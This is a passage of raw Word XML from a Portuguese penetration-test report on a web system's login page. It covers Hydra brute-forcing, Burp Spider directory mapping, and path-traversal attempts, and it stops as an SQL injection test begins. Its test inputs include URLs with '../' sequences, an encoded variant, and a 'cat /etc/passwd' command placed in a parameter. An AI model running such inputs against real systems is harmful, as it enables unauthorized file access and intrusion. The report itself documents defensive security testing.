          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3261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 xml:space="preserve">PASS é onde a Hydra deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8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7260B8" w:rsidRDefault="008C6DC7" w:rsidP="0063043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260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-V” é para exibir no console o resultado da operação.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C10DC" w:rsidRDefault="005967D5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76417A" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C" w:rsidP="00AC10DC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D76012" w:rsidRPr="00F15F82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="00456110" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conforme mostra a figura 1, todas as tentativas configuradas na Hydra foram executadas com sucesso.</w:t>
      </w:r>
      <w:r w:rsidR="00456110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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O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sistema é vulnerável ao acesso via força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FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">bruta, pois permite que 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várias requisições sejam feitas ao servidor por tempo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indeterminado. Como não há mecanismo de bloqueio para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FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>inúmeras requisições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, o sistema abre uma brecha para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que senhas de acesso ao sistema possam ser descobertas após</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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76417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>várias tentativas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00F15F82" w:rsidRDefault="00456110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654D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3A9FEF5" wp14:editId="3BA6EEAC">
            <wp:extent cx="5400040" cy="38201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                                        Figura 1 - Resultado da operação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A089C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E650F5" w:rsidP="00E650F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4.3.1.2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. Tela Login - Exploração via Path Transversal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entre os dias 31/03/16 e 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 2 horas e 30 minutos. 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1557D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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ara identificar a estrutura de diretório</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s do sistema dentro do servidor, f</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oi utilizada</w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp Spider</w:t>
      </w:r>
      <w:r w:rsidR="00E158B8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45732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ferramenta Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ambas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">abordadas no subcapítulo 3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A7473" w:rsidRPr="00F15F82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FCCEF39" wp14:editId="34022809">
            <wp:extent cx="2507141" cy="317182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(Editada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4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1F" w:rsidRPr="00F15F82" w:rsidRDefault="00623C1F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>Figura 2 - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="002D4365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BD33F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bjetivo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00846A20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Dada a estrutura hierárquica do sistema descrita na figura </w:t>
      </w:r>
      <w:r w:rsidR="00BE4C3F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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, o objetivo do teste é utilizar entradas maliciosas na URL para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conseguir acesso a loca</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is não autorizados a um usuário</w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do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sistema.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D4365" w:rsidRDefault="002D4365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48383A" w:rsidP="00284BB3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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Quando o sistema não consegue efetuar um login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r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/login.php?</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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logado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=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B959F5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 primeira </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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é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fazer uma requisição ao servidor alterando a url citada anteriormente para: </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r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/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF0646" w:rsidRPr="00F15F82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827015" w:rsidRDefault="00827015" w:rsidP="00827015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F15F82" w:rsidRDefault="00284BB3" w:rsidP="00630433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 O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comando “../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="00630433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O comando </w:t>
      </w:r>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dir,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no</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015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827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidR="00BA7CEE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema operacional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Windows</w:t>
      </w:r>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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serve para listar os arquivos e diretórios dentro da pasta atual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1417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Pr="00827015" w:rsidRDefault="00827015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827015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284BB3" w:rsidRDefault="00827015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284BB3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27015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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Default="005967D5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B959F5" w:rsidRPr="00F15F82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84BB3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84BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="708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/login.php?logado= ../../cat /etc/passwd,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F15F82" w:rsidRDefault="00817857" w:rsidP="00630433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O comando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“../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00630433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comando </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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cat /etc/passwd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, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00284BB3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Pr="00284BB3" w:rsidRDefault="00817857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284BB3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284BB3" w:rsidRDefault="00817857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284BB3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17857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00817857">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="696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Default="005967D5" w:rsidP="00817857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3164B7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00817857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544368" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w: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3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817857" w:rsidRDefault="008C6DC7" w:rsidP="00817857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/login.php?logado=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f%2e%2e%2f (código equivalente a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../../),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8C6DC7" w:rsidRDefault="00830E80" w:rsidP="00817857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comando “../../” serve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para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda 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17857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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17857" w:rsidRDefault="005967D5" w:rsidP="00817857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817857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4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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00284BB3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/login.php?logado=../data.js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para acessar o arquivo “data.js”,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6C31FD" w:rsidRPr="00F15F82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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="00630433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6C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “../” serve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para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="00630433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“</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ata.js</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é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um arquivo descoberto através do es</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">caneamento realizado pela funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp Spider</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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da ferramenta</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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para mapear a estrutura de pastas da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00284BB3" w:rsidRDefault="00284BB3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84BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3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284BB3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284BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3" w:rsidP="00284BB3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284BB3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284BB3" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="00284BB3">
      <w:p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84BB3" w:rsidRDefault="005967D5" w:rsidP="00284BB3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284BB3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5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/login.php?logado=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./ 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F15F82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comando  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRDefault="002C0836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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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Default="003164B7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2C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836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Default="005967D5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6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/login.php?login=teste&amp;senha=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./,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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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2C0836" w:rsidRPr="00F15F82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comando  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD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6C31FD" w:rsidRPr="00F15F82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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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F15F82" w:rsidRDefault="006C31FD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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema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 impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: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7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/login.php?login=teste&amp;senha=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..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F15F82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2C0836" w:rsidRDefault="006D580D" w:rsidP="002C083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 comando</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD" w:rsidRPr="00F15F82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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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F15F82" w:rsidRDefault="003164B7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 xml:space="preserve">Espera-se que o sistema bloqueie o acesso. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="002C083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Default="005967D5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2C0836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F15F82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9D0F86" w:rsidRPr="00F15F82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135C4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B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3.1.3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Tela Login - Mapeamento da hierarquia de pastas do sistema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30/03/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Utilizar de forma automatizada o módulo Burp Spider da ferramen</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ta Burp Suite e a</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> partir da URL da tela de Login: IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da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hierarquia de diretórios do sistema armazenados dentro do servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos códigos da aplicação.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384949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Acessar a página do Login utilizando a url http:// IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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/login.php. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36925" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925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F15F82" w:rsidRDefault="00384949" w:rsidP="00384949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F15F82" w:rsidRDefault="00C36925" w:rsidP="00384949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não permita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a visualização da hierarquia de pastas do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384949" w:rsidRDefault="005967D5" w:rsidP="00384949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384949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Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00654DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF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64B7" w:rsidRPr="00F15F82" w:rsidRDefault="008A7473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BF9D013" wp14:editId="19B040F2">
            <wp:extent cx="1809750" cy="1276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(Editada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 xml:space="preserve">Figura 3 - Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="00384949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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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384949" w:rsidP="003849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4.3.1.4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Tela Login - Exploração via SQL Injection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07/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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40 minutos.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Submeter entradas maliciosas no sistema através de injeção de</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> códigos SQL na página de Login. Então, atra</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
